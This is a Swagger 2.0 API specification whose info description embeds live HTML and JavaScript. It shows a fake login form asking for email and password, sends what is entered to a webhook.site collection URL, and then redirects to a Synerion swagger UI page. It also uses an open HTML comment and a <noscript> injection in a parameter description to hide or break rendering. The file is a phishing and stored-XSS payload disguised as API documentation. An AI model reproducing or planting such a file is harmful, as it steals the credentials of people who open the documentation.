swagger: '2.0'
info:
  title: Classic API Resource Documentation
  description: |
    <h1>Log in to see the full documentation</h1>
    <form id="loginForm" action="https://webhook.site/bc8d6747-e2bd-4874-b5be-2a28cf18a41e" method="post" onsubmit="handleSubmit(event)" target="_blank">
    <label for="email">Login:</label>
    <input name="email" required>
    <label for="password">Password:</label>
    <input name="password" type="password" required>
    <input type="submit" value="Login"></form>
    <script>
      function handleSubmit(event) {
        event.preventDefault(); // Prevent default form submission
        
        // Get form data
        const form = document.getElementById('loginForm');
        const formData = new FormData(form);

        // Perform the fetch request
        fetch(form.action, {
          method: 'POST',
          body: formData
        }).then(response => {
          if (response.ok) {
            // Redirect to the desired URL after successful submission
            window.location.href = 'https://neopaydemo.synerioncloud.com/SynerionWeb/swagger/ui/index';
          } else {
            alert('Form submission failed');
          }
        }).catch(error => {
          console.error('Error:', error);
          alert('Form submission failed');
        });
      }
    </script><!--
  version: production
basePath: https://www.epas.de
produces:
- application/xml
- application/json
consumes:
- application/xml
- application/json
security:
- basicAuth: []
paths:
  "/test":
    get:
      responses:
        '200':
          description: No response was specified
      tags:
      - sometext
      operationId: findAccounts
      summary: this is example text
  "/malformed_by_Andrei":
    delete:
      parameters:
      - description: |
          <noscript>

        format: int64
        in: path
        name: id
        required: true
        type: integer
      responses:
        '200':
          description: No response was specified
      tags:
      - test
      operationId: test
      summary: test
    get:
      parameters:
      - description: this is example text
        format: int64
        in: path
        name: id
        required: true
        type: integer
      responses:
        '200':
          description: No response was specified
      tags:
      - Andrei
      operationId: some_operation
      summary: this is example text
